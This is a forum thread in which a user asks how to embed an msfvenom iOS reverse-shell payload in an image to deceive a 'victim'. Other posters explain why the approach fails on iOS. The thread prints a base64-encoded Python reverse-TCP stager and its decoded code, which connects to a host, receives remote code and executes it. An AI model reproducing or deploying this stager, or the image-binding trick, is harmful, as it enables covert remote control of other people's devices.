Apple iOS file types...

[printf_cyber]

Hey Guys!

 

So i wanted to embed a payload into an image using fakeimageexploiter. Now, the payload would be a machos file for iOS (created using msfvenom) but fakeimageexploiter only supports 'ps1, exe, bat, txt' payloads that are not readable by iOS (i think). And so i want to know if there's a way to embed machos payload for iOS into jgp/jpeg/png or another image type to bind a reverse tcp shell.

 

(and ofc im doing this for pen testing i mean just to clarify cz then the mods gonna take action and stuff)

Thanks in advance

[Sauron]

I'm pretty sure you can read a .txt file in IOS but I would imagine the payload would be platform dependent... just because you can technically read it on IOS doesn't mean it will actually do anything.

[printf_cyber]

5 hours ago, Sauron said:

I'm pretty sure you can read a .txt file in IOS but I would imagine the payload would be platform dependent... just because you can technically read it on IOS doesn't mean it will actually do anything.

that makes sense but the question's still there, how do i embed a machos file that was created using this payload: "osx/armle/shell_reverse_tcp" into an image file. And ur right its platform dependent which is why there's a ton of payloads u can choose between i mean there's one for windows (windows/meterpreter/reverse_tcp) and for android (android/meterpreter/reverse_tcp) so yea its platform dependent which is why i cannot use any supported file extensions in iOS. Btw i am not an iOS user...

[Sauron]

1 minute ago, mbasil22 said:

that makes sense but the question's still there, how do i embed a machos file that was created using this payload: "osx/armle/shell_reverse_tcp" into an image file. And ur right its plateform dependent which is why there's a ton of payloads u can choose between i mean there's one for windows (windows/meterpreter/reverse_tcp) and for android (android/meterpreter/reverse_tcp) so yea its platform dependent which is why i cannot use any supported file extensions in iOS. Btw i am not an iOS user...

It's not about the extension here, it's about the content. If iOS isn't explicitly supported by the tool then there's probably no way to attack it using that tool. Unless you're willing and able to write your own payload that is.

[printf_cyber]

5 hours ago, Sauron said:

It's not about the extension here, it's about the content. If iOS isn't explicitly supported by the tool then there's probably no way to attack it using that tool. Unless you're willing and able to write your own payload that is.

hmm, well the content is python i mean if u open the file u will get this:

 

 

aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuMicsNDQzKSkKaT1zdHJ1Y3QudW5wYWNsKCc+aScscy5yZWN2KDQpKVswXQpkPXMucmVjdihpKQp3aGlsZSBsZW4oZCk8aToKCWQrPXMucmVjdihpLWxlbihkKSkKZXhlYyhkLHtzJzpzfSk=

 

 

and then if u decrypt the above base64 code u get this:

 

import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('192.168.1.2',443))
i=struct.unpacl('>i',s.recv(4))[0]
d=s.recv(i)
while len(d)<i:
    d+=s.recv(i-len(d))
exec(d,{s':s})

 

and this code is python and idk if python runs on iOS... like if ur talking content then that's that

 

 

Now, bcz thisis

[Sauron]

1 hour ago, mbasil22 said:

idk if python runs on iOS

It doesn't.

[wasab]

 

10 hours ago, mbasil22 said:

and this code is python and idk if python runs on iOS... like if ur talking content then that's that

 

 

Now, bcz thisis

No interpretor for iOS. Get Android, install termux emulator and then apt install python3 if you want to run python code on a phone. 

 

[printf_cyber]

4 hours ago, wasab said:

 

No interpretor for iOS. Get Android, install termux emulator and then apt install python3 if you want to run python code on a phone. 

 

 

12 hours ago, Sauron said:

It doesn't.

Which means there is no possible way to create an undetectable payload for iOS and social engineering is the only way to go i mean ill have to make the victim install some kind of interpreter too (only IF there's one at that time or else eve social engineering would fail i guess) after which he/she will be able to execute the python code. Why does fakeimageexploiter not support machos or ipa file types tho... i mean what's wrong with machos/ipa?

[Sauron]

1 hour ago, mbasil22 said:

Which means there is no possible way to create an undetectable payload for iOS and social engineering is the only way to go i mean ill have to make the victim install some kind of interpreter too (only IF there's one at that time or else eve social engineering would fail i guess) after which he/she will be able to execute the python code.

Python isn't the only way you can attack a system... it's just the only way that tool supports. And even if you got the victim to install an interpreter that doesn't mean your python code would do anything at all - smartphone applications are sandboxed, the chances of you being able to do anything malicious through python are slim at best. And either way the code would have to be specifically adapted.

1 hour ago, mbasil22 said:

Why does fakeimageexploiter not support machos or ipa file types tho... i mean what's wrong with machos/ipa?

The file extension doesn't matter, what matters is how the system will read it.

[printf_cyber]

On 12/1/2019 at 7:01 PM, Sauron said:

Python isn't the only way you can attack a system... it's just the only way that tool supports. And even if you got the victim to install an interpreter that doesn't mean your python code would do anything at all - smartphone applications are sandboxed, the chances of you being able to do anything malicious through python are slim at best. And either way the code would have to be specifically adapted.

The file extension doesn't matter, what matters is how the system will read it.

got it :) thnx